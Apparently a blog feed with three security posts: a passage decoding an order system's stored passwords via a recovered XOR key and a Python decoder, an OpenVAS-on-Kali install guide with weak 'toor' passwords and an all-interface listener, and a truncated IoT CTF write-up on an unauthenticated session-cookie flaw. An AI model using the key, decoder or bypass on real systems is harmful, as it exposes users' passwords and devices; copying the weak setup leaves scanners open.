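<p>Cracking the password naturally takes more than one sample. <b>The table below</b> lists the <b>LoginPWD</b> values the order system returned for different passwords, compared with the BASE64 encoding of each password.</p>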
<table border="1" bordercolordark="#808080" bordercolorlight="#808080" cellpadding="2" cellspacing="1" style="border-collapse: collapse; font-size: 10pt;">
<thead>
<tr>
<td>NO</td>
<td>Password</td>
<td>Direct BASE64 encoding</td>
<td>Password (hex)</td>
<td>LoginPWD</td>
<td>Decoded to hex</td>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>AaBbCcDdE012</td>
<td>QWFCY<span style="background-color: #fcff01;"><span style="color: #674ea7;"><b>kN</b></span></span>jRGRFMDEy</td>
<td>416142624363446445303132</td>
<td>AZiE4<span style="background-color: #fcff01;"><b><span style="color: #674ea7;">EE</span></b></span>KG79Npb05<b><span style="color: #2b00fe;">nw==</span></b></td>
<td>019884E0410A1BBF4DA5BD399F</td>
</tr>
<tr>
<td>2</td>
<td>AaBbCcdDe012</td>
<td>QWFCY<span style="background-color: #fcff01;"><span style="color: #674ea7;"><b>kN</b></span></span>jZERlMDEy</td>
<td>416142624363644465303132</td>
<td>AZiE4<span style="background-color: #fcff01;"><span style="color: #674ea7;"><b>EE</b></span></span>KO59tpb05<span style="color: #2b00fe;"><b>nw==</b></span></td>
<td>019884E0410A3B9F6DA5BD399F</td>
</tr>
<tr>
<td>3</td>
<td><span style="color: red;">ABC123</span>456789</td>
<td>QUJDMTIzNDU2Nzg5</td>
<td>414243313233343536373839</td>
<td><span style="color: red;">AbuFszBa</span>a+4+orQy<span style="color: #2b00fe;"><b>nw==</b></span></td>
<td>01BB85B3305A6BEE3EA2B4329F</td>
</tr>
<tr>
<td>4</td>
<td>abc123456789</td>
<td>YWJjMTIzNDU2Nzg5</td>
<td>616263313233343536373839</td>
<td>IZulszBaa+4+orQy<span style="color: #2b00fe;"><b>nw==</b></span></td>
<td>219BA5B3305A6BEE3EA2B4329F</td>
</tr>
<tr>
<td>5</td>
<td><span style="color: red;">ABC123</span></td>
<td>QUJDMTIz</td>
<td>414243313233</td>
<td><span style="color: red;">AbuFszBa</span><span style="color: #2b00fe;"><b>Xw==</b></span></td>
<td>01BB85B3305A5F</td>
</tr>
<tr>
<td>6</td>
<td>abc123</td>
<td>YWJjMTIz</td>
<td>616263313233</td>
<td>IZulszBa<span style="color: #2b00fe;"><b>Xw==</b></span></td>
<td>219BA5B3305A5F</td>
</tr>
</tbody>
</table>
<p><b>Several observations can be drawn from the table above</b></p>
<ol>
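<li>When the password length differs, the length of <b>LoginPWD</b> differs as well, but it <span style="color: #cc0000;">remains a multiple of 4</span>.</li>
<li><b>LoginPWD</b> is always <span style="color: #cc0000;">4 characters longer</span> than the direct BASE64 encoding; see the <span style="color: #2b00fe;"><b>bold blue</b></span> text in the LoginPWD column of the table above.</li>
<li>The lengths of the passwords tested are all multiples of 3, and the <b>last two</b> of the 4 extra LoginPWD characters are always <b>==</b>, which under the BASE64 rules means 2 <b>padding</b> characters. The inference is that the order system <b>appends 1 character to the original password</b> before encoding it.<br /></li>
<li>Comparing the passwords, the same characters in the same positions produce the same <b>LoginPWD</b> content, as in the <span style="color: red;">red</span> parts of rows 3 and 5. <br /></li>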
</ol>
<p><b>Next, consider which encoding method the developer may have used</b></p>
<ol>
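<li>Is a lookup table used to substitute the BASE64 characters?<br />In the <span style="background-color: #fcff01;">yellow-highlighted</span> text of item 1 or 2 in the table above, however, both <b>k</b> and <b>N</b> map to <b>E</b>, so this clearly does not fit.</li><li>Is a specific KEY used for the transformation?<br />Try an <b>XOR</b> of the "Password (hex)" value with the "Decoded to hex" value (the last byte of "Decoded to hex" is the appended one, so drop it first); the result is in the "XOR result" column of the table below <br /></li>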
</ol>
<table border="1" bordercolordark="#808080" bordercolorlight="#808080" cellpadding="2" cellspacing="1" style="border-collapse: collapse; font-size: 10pt;">
<thead>
<tr>
<td>NO</td>
<td>Password</td>
<td>Password (hex)</td>
<td>Decoded to hex</td>
<td>XOR result</td>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>AaBbCcDdE012</td>
<td>416142624363446445303132</td>
<td>019884E0410A1BBF4DA5BD399F</td>
<td><span style="color: red;">40F9C6820269</span><span style="background-color: #ea9999;">5F</span>DB08958C0B</td>
</tr>
<tr>
<td>2</td>
<td>AaBbCcdDe012</td>
<td>416142624363644465303132</td>
<td>019884E0410A3B9F6DA5BD399F</td>
<td><span style="color: red;">40F9C6820269</span><span style="background-color: #ea9999;">5F</span>DB08958C0B</td>
</tr>
<tr>
<td>3</td>
<td>ABC123456789</td>
<td>414243313233343536373839</td>
<td>01BB85B3305A6BEE3EA2B4329F</td>
<td><span style="color: red;">40F9C6820269</span><span style="background-color: #ea9999;">5F</span>DB08958C0B</td>
</tr>
<tr>
<td>4</td>
<td>abc123456789</td>
<td>616263313233343536373839</td>
<td>219BA5B3305A6BEE3EA2B4329F</td>
<td><span style="color: red;">40F9C6820269</span><span style="background-color: #ea9999;">5F</span>DB08958C0B<br /></td>
</tr>
<tr>
<td>5</td>
<td>ABC123</td>
<td>414243313233</td>
<td>01BB85B3305A<span style="background-color: #ea9999;">5F</span></td>
<td><span style="color: red;">40F9C6820269</span><br /></td>
</tr>
<tr>
<td>6</td>
<td>abc123</td>
<td>616263313233</td>
<td>219BA5B3305A<span style="background-color: #ea9999;">5F</span></td>
<td><span style="color: red;">40F9C6820269</span><br /></td>
</tr>
</tbody>
</table>
<p><b>The "XOR result" column above leads to the following conclusions</b></p>
<ol>
<li>The <b>XOR</b> results of items 1 to 6 show that the order-placing system applies <b>XOR</b> <b>character by character</b>.</li>
<li>The extra "<span style="background-color: #ea9999;">5F</span>" in item 5 equals the KEY at the same position in item 4, so the character the order-placing system appends is the ASCII <b>NUL</b> character (hex <span style="background-color: #ea9999;"><b>00</b></span>).</li>
</ol>
<p>The <b>35-character XOR key recovered</b> so far is "40F9C68202695FDB08958C0B9F74F518BC6361D42F22998F31B2895B67BF64AA505D528E", that is, "0x40,0xF9,0xC6,0x82,0x02,0x69,0x5F,0xDB,0x08,0x95,0x8C,0x0B,0x9F,0x74,0xF5,0x18,0xBC,0x63,0x61,0xD4,0x2F,0x22,0x99,0x8F,0x31,0xB2,0x89,0x5B,0x67,0xBF,0x64,0xAA,0x50,0x5D,0x52,0x8E"</p>
<p>Once the XOR key is known, any LoginPWD can be decoded with the following steps:</p>
<ol>
<li>Decode <b>LoginPWD</b> with <a href="https://base64.guru/converter/decode/hex"><b>BASE64 to Hex</b></a> to get the hexadecimal result, denoted <span style="color: #990000;"><b>HEX</b></span>.</li>
<li>Discard the rightmost byte of <span style="color: #990000;"><b>HEX</b></span>; it comes from the appended NUL character and does not matter. Denote the result <span style="color: #990000;"><b>HEX2</b></span>.<br /></li><li>Take as much data from the left of the XOR key as the length of <span style="color: #990000;"><b>HEX2</b></span>, denoted <span style="color: #990000;"><b>KEY2</b></span>.</li>
<li><a href="http://xor.pw/"><b>XOR</b></a> <span style="color: #990000;"><b>HEX2</b></span> with <span style="color: #990000;"><b>KEY2</b></span>.</li><li><a href="https://www.rapidtables.com/convert/number/hex-to-ascii.html"><b>Convert</b></a> the resulting hexadecimal value <a href="https://www.rapidtables.com/convert/number/hex-to-ascii.html"><b>to ASCII</b></a> to obtain the plaintext password.</li>
</ol>
<p>Take "<b>LoginPWD: E62TszBaa+4+orQynw==</b>" as an example:</p>
<ol>
<li>Decode "<b><span style="color: #0c343d;">E62TszBaa+4+orQynw==</span></b>" with <a href="https://base64.guru/converter/decode/hex">BASE64 to Hex</a> to get "<span style="color: #2b00fe;"><b>13AD93B3305A6BEE3EA2B4329F</b></span>".</li>
<li>Discard the rightmost byte (9F) of "<span style="color: #2b00fe;"><b>13AD93B3305A6BEE3EA2B4329F</b></span>", leaving 12 bytes.<br /></li>
<li>Take 12 bytes from the left of the XOR key, that is, "<span style="color: #b45f06;"><b>40F9C68202695FDB08958C0B</b></span>".<br /></li><li>XOR "<span style="color: #2b00fe;"><b>13AD93B3305A6BEE3EA2B432</b></span>" with "<span style="color: #b45f06;"><b>40F9C68202695FDB08958C0B</b></span>" to get "<b><span style="color: #990000;">535455313233343536373839</span></b>".</li><li><a href="https://www.rapidtables.com/convert/number/hex-to-ascii.html">Convert</a> "<b><span style="color: #990000;">535455313233343536373839</span></b>" to ASCII to get the plaintext password "<span style="background-color: #f4cccc; font-size: large;"><b>STU123456789</b></span>". <br /></li>
</ol>
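<p>The analysis and decoding steps above in Python, as an added example that is not part of the original post: it recovers the key bytes from the (password, LoginPWD) pairs in the tables, confirms that every pair yields the same key (which is why a fixed XOR key protects nothing once one pair is known), and decodes the worked example. The function names are chosen for this example; the key and sample values are copied from this page.</p>

```python
import base64

# XOR key as published on this page (hex string copied verbatim).
PAGE_KEY = bytes.fromhex(
    "40F9C68202695FDB08958C0B9F74F518BC6361D42F22998F31B2895B67BF64AA505D528E"
)

# (password, LoginPWD) pairs copied from the tables on this page.
KNOWN_PAIRS = [
    ("AaBbCcDdE012", "AZiE4EEKG79Npb05nw=="),
    ("AaBbCcdDe012", "AZiE4EEKO59tpb05nw=="),
    ("ABC123456789", "AbuFszBaa+4+orQynw=="),
    ("abc123456789", "IZulszBaa+4+orQynw=="),
    ("ABC123", "AbuFszBaXw=="),
    ("abc123", "IZulszBaXw=="),
]


def xor_bytes(a, b):
    """XOR two byte strings, stopping at the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def recover_keystream(password, login_pwd):
    """Known-plaintext recovery: (password + NUL) XOR decoded LoginPWD."""
    cipher = base64.b64decode(login_pwd, validate=True)
    plain = password.encode("ascii") + b"\x00"
    if len(cipher) != len(plain):
        raise ValueError("length mismatch: scheme is not password + NUL")
    return xor_bytes(plain, cipher)


def merge_keystreams(pairs):
    """Check that all pairs agree on the key and return the longest prefix seen."""
    key = b""
    for password, login_pwd in pairs:
        stream = recover_keystream(password, login_pwd)
        overlap = min(len(key), len(stream))
        if key[:overlap] != stream[:overlap]:
            raise ValueError("keystream differs for %r: key is not fixed" % password)
        if len(stream) > len(key):
            key = stream
    return key


def decode_login_pwd(login_pwd, key):
    """Steps 1 to 5 from the page: BASE64 decode, XOR with the key, drop the NUL."""
    cipher = base64.b64decode(login_pwd, validate=True)
    if not cipher:
        raise ValueError("empty LoginPWD")
    if len(cipher) > len(key):
        raise ValueError("LoginPWD is longer than the known key")
    plain = xor_bytes(cipher, key)
    # The appended NUL must decode back to 0x00; anything else means the
    # key or the assumed scheme is wrong.
    if plain[-1] != 0:
        raise ValueError("trailing byte is not NUL")
    return plain[:-1].decode("ascii")


if __name__ == "__main__":
    recovered = merge_keystreams(KNOWN_PAIRS)
    print("key bytes recovered from the table:", recovered.hex().upper())
    print("matches the published key prefix:", recovered == PAGE_KEY[:len(recovered)])
    print("decoded example:", decode_login_pwd("E62TszBaa+4+orQynw==", PAGE_KEY))
```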
<hr />
<fieldset style="background-color: #bbffbb;">
<legend style="background-color: #bbffbb; font-weight: bold;">Online tools used</legend>
<p><b>BASE64 encode/decode</b>: <a href="https://base64.guru/converter/decode/hex">https://base64.guru/converter/decode/hex</a></p><p><b>XOR calculator</b>: <a href="http://xor.pw/">http://xor.pw/</a></p><p><b>ASCII/HEX conversion</b>: <a href="https://www.rapidtables.com/convert/number/hex-to-ascii.html">https://www.rapidtables.com/convert/number/hex-to-ascii.html</a><br /></p>
</fieldset>
</div>雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-71948539485521417102020-11-15T16:58:00.005+08:002023-03-11T09:16:27.017+08:00Installing OpenVAS on a minimal Kali 2020.3 environment<div style="border: 4px solid rgb(0, 0, 204); font-size: 12pt; line-height: 200%; padding: 8px;">
<p style="text-indent: 2em;">For penetration testers, <span style="color: #990000;"><b>Nessus</b></span> and <span style="color: #990000;"><b>OpenVAS</b></span> are two very practical (and free) vulnerability scanners. To avoid hurting their performance, I usually install each of them on a dedicated machine. Both tools use a browser as the user interface, so a dedicated installation does not need to keep X-WINDOW, which leaves the resources fully available to the scanner.</p>
<p style="text-indent: 2em;">My book "<a href="https://www.tenlong.com.tw/products/9789865023584?list_name=b-r30-zh_tw" target="_blank"><b>Kali Linux 滲透測試工具</b></a>" also covers installing OpenVAS, but the tool has been revised since and the installation procedure has changed again, so here is a supplement.</p>
<p><span style="color: #274e13; font-size: large;"><b>1. Install a minimal Kali environment</b></span></p>
<div style="background-color: black; color: #fbcf08; margin-top: -16px;">
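<ol><li>Download "Kali Linux 64-Bit (NetInstaller)" from <a href="https://www.kali.org/" style="color: white;" target="_blank"> kali.org</a>.</li><li>Create a virtual machine, choose "<span style="color: white;">Install disk image file(iso)</span>" as the installation method, and use the "kali-linux-2020.3-installer-netinst-amd64.iso" downloaded in the previous step as the ISO source.</li><li>For the operating system type choose "<span style="color: white;">Linux/Debian-9.x 64 bit</span>", and set the disk size to 100GB.</li><li>Start the virtual machine to enter the operating system installer and follow the on-screen instructions. To avoid a conflict with the default host name, specify a suitable Hostname; I used OPENVAS2020.</li><li>Kali <span style="color: #ea9999;"><b>no longer provides root privileges</b></span> by default, so a user account must be specified during installation. I chose openvas as the user, with the password set to toor.</li><li>When selecting the software to install, <span style="color: #ea9999;">deselect Desktop environment and top10</span> (see the figure below) and keep only the tools a minimal environment needs.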
<div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiROMJy6QWn4DbAp4XWlbEEngTEWcbcRmGp0reuNCHCdHZixHBxAq71fSJmRvJFqkUUmOx2KL5Hn0Wet5f9ILlC7JPLrKVP3RE5mJRVloQkY0tyxozYrmd92J7-hIw-7kRxA6OnIyDebrlo/s767/openvas-01.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="363" data-original-width="767" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiROMJy6QWn4DbAp4XWlbEEngTEWcbcRmGp0reuNCHCdHZixHBxAq71fSJmRvJFqkUUmOx2KL5Hn0Wet5f9ILlC7JPLrKVP3RE5mJRVloQkY0tyxozYrmd92J7-hIw-7kRxA6OnIyDebrlo/s400/openvas-01.PNG" width="400" /></a></div></div>
</li>
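<li>The software installation may fail during the process (see the figure below). Follow the on-screen instructions and press "<span style="color: white;">Enter</span>"; on the next screen, manually select "<span style="color: white;">Install the GRUB boot loader</span>" to skip the software installation step.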
<div><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNZesTAHLTcsBc9fzKA5rRlYGbjKM1vKLPUylQtSehSNAYMg3Jvt4SkeUJck-kQHMJTGiQaEcvYiqMOf6-woKJqq9FBvyCBMJ8qUKDw1CqDz7qo-1L63VvHaAYae30zUtv2XDfzoqAu9Mx/s778/openvas-02.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="219" data-original-width="778" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNZesTAHLTcsBc9fzKA5rRlYGbjKM1vKLPUylQtSehSNAYMg3Jvt4SkeUJck-kQHMJTGiQaEcvYiqMOf6-woKJqq9FBvyCBMJ8qUKDw1CqDz7qo-1L63VvHaAYae30zUtv2XDfzoqAu9Mx/s400/openvas-02.PNG" width="400" /></a></div></div>
</li>
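<li>After installation the machine reboots automatically and comes up in the command-line interface. Log in with the account and password set in step 5. Remember that this account has no root privileges, so many commands must be prefixed with <span style="color: #ea9999;"><b>sudo</b></span>.</li></ol>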
</div>
<p><span style="color: #274e13; font-size: large;"><b>2. Update Kali and install the required tools as follows</b></span></p>
<div style="background-color: black; color: #fbcf08; margin-top: -16px;">
<ol>
<li>sudo apt update && sudo apt upgrade -y <span style="color: #04ff00;">#Update the operating system (do this every few days)</span></li>
<li>sudo apt install locate curl wget
<span style="color: #04ff00;">#Install the required tools</span></li>
<li>sudo apt install gvm*
<span style="color: #04ff00;"> #Install OpenVAS</span></li><li>sudo service --status-all
<span style="color: #04ff00;"> #Check whether postgresql, redis-server and gvmd are running; if not, start them manually</span><br />
<div style="border: 2px solid white; padding: 4px;"><span style="color: #04ff00;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiVfLHTxJqvFXZpqNZWqwUisLJkjXJkfAiEoWrVUv3L4EEYnSAiix3Veahs5XW5oJ5aVXUf40Ig4okYNJfJR6UqjYNJZpNZQLiytApcQz7oV_YFFvRuYAlUj7z1mZ1GFTn1BgvENpBmIbl/s412/openvas-03.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="412" data-original-width="405" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiVfLHTxJqvFXZpqNZWqwUisLJkjXJkfAiEoWrVUv3L4EEYnSAiix3Veahs5XW5oJ5aVXUf40Ig4okYNJfJR6UqjYNJZpNZQLiytApcQz7oV_YFFvRuYAlUj7z1mZ1GFTn1BgvENpBmIbl/s320/openvas-03.PNG" /></a></div></span></div></li>
<li>sudo service redis-server start <span style="color: #04ff00;">
#Start redis-server manually; if an error message appears, see the "Note" at the end of this post<br /></span></li><li>sudo update-rc.d redis-server enable <span style="color: #04ff00;">#If redis-server starts, set it to start automatically at boot</span></li>
<li>sudo service postgresql start <span style="color: #04ff00;">#Start postgresql</span><br /></li>
<li>sudo update-rc.d postgresql enable <span style="color: #04ff00;">#Set postgresql to start automatically</span><br /></li>
<li>sudo reboot <span style="color: #04ff00;"> #Reboot the operating system</span><br /><span style="color: #04ff00;"><span style="color: red;">Do not use su - to switch to root</span>; otherwise running "<span style="color: white;">gvm-setup</span>" fails with the error<br />
"<span style="color: #ea9999;">could not change directory to /root permission denied</span>" <br /><br /></span></li>
<li>sudo gvm-setup
<span style="color: #04ff00;">#Run the OpenVAS setup (this takes a long time)</span></li>
<li>sudo gvm-check-setup <span style="color: #04ff00;">
#Run the OpenVAS check to see what is missing</span><br /><span style="color: #04ff00;">Watch for error messages (those starting with <span style="color: red;">FIX:</span>) and correct them as prompted, until the output of "<span style="color: white;">sudo gvm-check-setup</span>" has no remaining "FIX:" items.</span>
<div style="border: 2px solid white; padding: 4px;"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2GPnM2MuHuRBRABCdy8_gKCV1Ap_I2y7PjFqdydm1QrnuqxN8EWflREslrEg-0JqHyoBLzgNAMSz1fVJJC20TwwKLQ6_t82kWaoksKAweLYDwAcFwXIg5q0mCd5OO_rYbAyAqYCUWggVA/s884/openvas-05.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="643" data-original-width="884" height="291" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2GPnM2MuHuRBRABCdy8_gKCV1Ap_I2y7PjFqdydm1QrnuqxN8EWflREslrEg-0JqHyoBLzgNAMSz1fVJJC20TwwKLQ6_t82kWaoksKAweLYDwAcFwXIg5q0mCd5OO_rYbAyAqYCUWggVA/w400-h291/openvas-05.PNG" width="400" /></a></div></div>
</li>
<li>sudo service --status-all
<span style="color: #04ff00;"> #Check again whether postgresql, redis-server and gvmd are running</span></li>
<li>sudo service gvmd start <span style="color: #04ff00;">
#Start gvmd manually</span></li>
<li>sudo update-rc.d gvmd enable <span style="color: #04ff00;">#Set gvmd to start automatically</span></li>
<li>sudo gvm-start <span style="color: #04ff00;">
#Start the OpenVAS server; if there are error messages, fix them</span></li></ol>
</div>
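<p><span style="color: #274e13; font-size: large;"><b>3. Operate the OpenVAS server from an external computer</b></span></p>
<p style="text-indent: 2em;">
By default OpenVAS only accepts connections from the local machine, but we installed it on a minimal Kali that has no browser of its own, so an external computer needs a way to connect to this OpenVAS server.</p>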
<div style="background-color: black; color: #fbcf08;">
<ol><li>sudo nano /lib/systemd/system/greenbone-security-assistant.service <br />Change the address gsad listens on: replace "<span style="color: white;">ExecStart=/usr/sbin/gsad --listen=<span style="color: #01ffff;"><b>127.0.0.1 </b></span>
--port=9392</span>"<br />with "<span style="color: white;">ExecStart=/usr/sbin/gsad --listen=<span style="color: #01ffff;"><b>0.0.0.0</b></span>
--port=9392</span>", so that it listens for requests on all network interfaces
<div style="border: 2px solid white; padding: 4px;"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMuuNz8cmGxwf128JgLC9ISYyeg5PSUNZSav51M2L7coHIRHBZUg-vmEyyUOQRjigPjWNA47b6e-QjaRKzn5DkcW5kE309AHWDblin0jgiP8EeIJnPN3i90GyKQ-R9dZaIaWiXmeePS-KD/s851/openvas-07.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="632" data-original-width="851" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMuuNz8cmGxwf128JgLC9ISYyeg5PSUNZSav51M2L7coHIRHBZUg-vmEyyUOQRjigPjWNA47b6e-QjaRKzn5DkcW5kE309AHWDblin0jgiP8EeIJnPN3i90GyKQ-R9dZaIaWiXmeePS-KD/s400/openvas-07.PNG" width="400" /></a></div></div></li><li>Save the file, then restart the virtual machine</li><li>After the virtual machine is back up, run "<span style="color: white;">sudo gvm-start</span>" to start the services</li><li>Connect with a browser on the external computer. It finally connects, but... what about the account and password?
<div style="border: 2px solid white; padding: 4px;"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFyHuc0che474dfNy9q_n2re0BE6Lf4fvgA0qvAMH72cSmpj_vQokRncEqz3OqOWpfLEXAtVtPhFDGuVinSD86qi7ylTqcRochG2JXylTGxgGOJCC0y0W983_dZYSWIojQx9FBezMRfz8D/s946/openvas-09.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="621" data-original-width="946" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFyHuc0che474dfNy9q_n2re0BE6Lf4fvgA0qvAMH72cSmpj_vQokRncEqz3OqOWpfLEXAtVtPhFDGuVinSD86qi7ylTqcRochG2JXylTGxgGOJCC0y0W983_dZYSWIojQx9FBezMRfz8D/s400/openvas-09.PNG" width="400" /></a></div></div>
</li></ol>
</div>
<p><span style="color: #274e13; font-size: large;"><b>4. What about the account and password?</b></span></p>
<p style="margin-left: 2em;">The OpenVAS credentials never came up during installation, so what now? No need to worry: go back to the OpenVAS server and reset the "admin" password with the following command<br />
<span style="background-color: black; color: #ffa400; padding: 4px 2em;">sudo runuser -u _gvm -- gvmd --user=admin --new-password=toor <br /></span></p>
<p style="margin-left: 2em;">To add other users, run the following command:<br />
<span style="background-color: black; color: #ffa400; padding: 4px 2em;">sudo runuser -u _gvm -- gvmd --create-user=<span style="color: #04ff00;">&lt;new-account&gt;</span> --password=<span style="color: #04ff00;">&lt;password&gt;</span></span></p>
<p><span style="color: #990000; font-size: large;"><b>Log in to OpenVAS again with "admin / toor": success!</b></span></p>
<hr style="color: #29fb08; height: 2px;" />
<p><span style="color: #274e13; font-size: large;"><b>Note:</b></span></p>
<p>If starting redis-server produces the error message "<span style="color: red;">redis-server is not running or not listening on
socket: /var/run/redis-openvas/redis-server.sock</span>", handle it as follows:</p>
<div style="background-color: black; color: #fbcf08;">
<ol><li>sudo nano /etc/redis/redis.conf <span style="color: #04ff00;"> #Edit redis.conf</span><br /></li>
<li>Search for the text "<span style="color: white;"><b>unixsocket</b></span>"; you should find the following two lines:<br />
# unixsocket /var/run/redis/redis.sock <br />
# unixsocketperm 700
</li>
<li>Remove the comment markers, save the file, and restart the OpenVAS server
<div style="border: 2px solid white; padding: 4px;"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEga5-KbQxj73kjFooRe1GtbT8Mjio6KSEG6yWhvDrYDLq8WfrLPBfZLeR5Ww3PSmaOET8ZN6GKy8LfIyIWE1dNGaPz0-jyTjZmMdidMKqPQMj1b1DpsCdqtigaomMQiBQz-qP-Ju5Lf7OsC/s803/openvas-10.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="622" data-original-width="803" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEga5-KbQxj73kjFooRe1GtbT8Mjio6KSEG6yWhvDrYDLq8WfrLPBfZLeR5Ww3PSmaOET8ZN6GKy8LfIyIWE1dNGaPz0-jyTjZmMdidMKqPQMj1b1DpsCdqtigaomMQiBQz-qP-Ju5Lf7OsC/s400/openvas-10.PNG" width="400" /></a></div></div>
</li>
</ol>
</div>
</div>
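雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com24tag:blogger.com,1999:blog-1967825056283652287.post-13841944829706754082020-11-07T12:19:00.003+08:002020-11-07T12:22:05.517+08:00An alternative solution to the LV2 challenge from the HITCON 2020 { IoT Hacking 101 } session<div style="border: 4px solid rgb(0, 0, 204); font-size: 12pt; line-height: 200%; padding: 8px;">
<p style="line-height: 150%; text-indent: 2em; word-spacing: 2px;">On the first day of this year's Hitcon
2020, <b>Jimmy Liu</b> presented "<b><span style="color: #cc0000;">IoT Hacking
101</span></b>", a hands-on session on basic penetration testing of IoT devices. The course materials can be downloaded from "<a href="https://github.com/DrmnSamoLiu/Hitcon-iot101">https://github.com/DrmnSamoLiu/Hitcon-iot101</a>"; for the slides, see DVIPcam_hitcon.pdf in the materials package. This post assumes you have already read and understood those slides.</p>
<p>A colleague who attended the session shared what they had learned afterwards, and while practising later I found that LV2 (slide 22) has another route to enabling the Telnet and FTP services, so I am noting it here.</p>
<p style="line-height: 150%; text-indent: 2em; word-spacing: 2px;">The IP camera in this challenge opens only ports 443, 554 and 8000 by default. The goal is to find a way to start the Telnet and FTP services on the device, that is, to open ports 23 and 21.<br /></p><p style="line-height: 150%; text-indent: 2em; word-spacing: 2px;">According to the slides, because the user has not changed the default passwords, an attacker can learn two sets of login credentials from the user manual: "<b><span style="color: #20124d;">root</span></b> /
<b><span style="color: #b45f06;">root</span></b>" and "<b><span style="color: #20124d;">user</span></b> / <b><span style="color: #b45f06;">DVIPcam</span></b>". In practice the root password has been changed, so logging in to the management interface directly as administrator is not possible, but <span style="color: #990000;">the user password has not been changed</span>; an attacker can <b>obtain administrator rights through privilege escalation</b> and enable the Telnet and FTP services from the "System
Configuration" page (slide 28). That technique is explained clearly in the slides, so I will not repeat it here.</p>
<p>But <span style="color: #cc0000;">what if the default password of user has been changed as well?</span> Is there a way to "<span style="color: #351c75;"><b>enable the Telnet service without any web credentials</b></span>"? The technique in this post is exactly that.</p>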
<p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;">
1. To analyse the web application's source code, first download the device's firmware update file (firmware.bin) from the login page.</p><p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR8VyN4iO2QJreJII5NfNkRro_JAMJY6yshM8fosMcFw0kUOG9XOwECGbifOondAtD6rKAKAWp-ntWy9MbbWnlpeL9ZNRftWJ4x-v9werWudOMStUno4siZG7m-fY6Q_VM1CsnL7e_kd89/s748/LV2-01.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="748" data-original-width="423" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR8VyN4iO2QJreJII5NfNkRro_JAMJY6yshM8fosMcFw0kUOG9XOwECGbifOondAtD6rKAKAWp-ntWy9MbbWnlpeL9ZNRftWJ4x-v9werWudOMStUno4siZG7m-fY6Q_VM1CsnL7e_kd89/w226-h400/LV2-01.png" width="226" /></a></div><p></p>
<p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;">
2. Open firmware.bin with <span style="color: #cc0000;"><b>7-zip</b></span> and inspect the <b>www/cgi-bin/ </b>directory, paying attention to the three files <span style="color: #cc0000;"><b>readcookie.cgi</b></span>, <span style="color: #cc0000;"><b>Config.cgi</b></span> and <span style="color: #cc0000;"><b>Configsubmit.cgi</b></span>.</p><p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie1LBWqjiTf9jAglZgj6BV4T9T1ZIVWpreZXP_Y8ct9R1-xynYim5QhomSiFvv9K2hdPmMJSNDSY_lrMGSO0ny06FpdFa_ZHf4MGpaDTfDLNW3CWCvZ81TVaRfWJFuGxQDZmf79k4VWzsW/s593/LV2-02.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="269" data-original-width="593" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie1LBWqjiTf9jAglZgj6BV4T9T1ZIVWpreZXP_Y8ct9R1-xynYim5QhomSiFvv9K2hdPmMJSNDSY_lrMGSO0ny06FpdFa_ZHf4MGpaDTfDLNW3CWCvZ81TVaRfWJFuGxQDZmf79k4VWzsW/w400-h181/LV2-02.png" width="400" /></a></div><p></p><p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;">3. Inspecting readcookie.cgi shows that calling this CGI <span style="color: #cc0000;">does not check whether the caller is logged in</span>, and that it writes HTTP_COOKIE to /var/Allowed_SessionID, while <b>Allowed_SessionID</b> is what decides whether a user is logged in. This is the flaw used here.</p><p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; 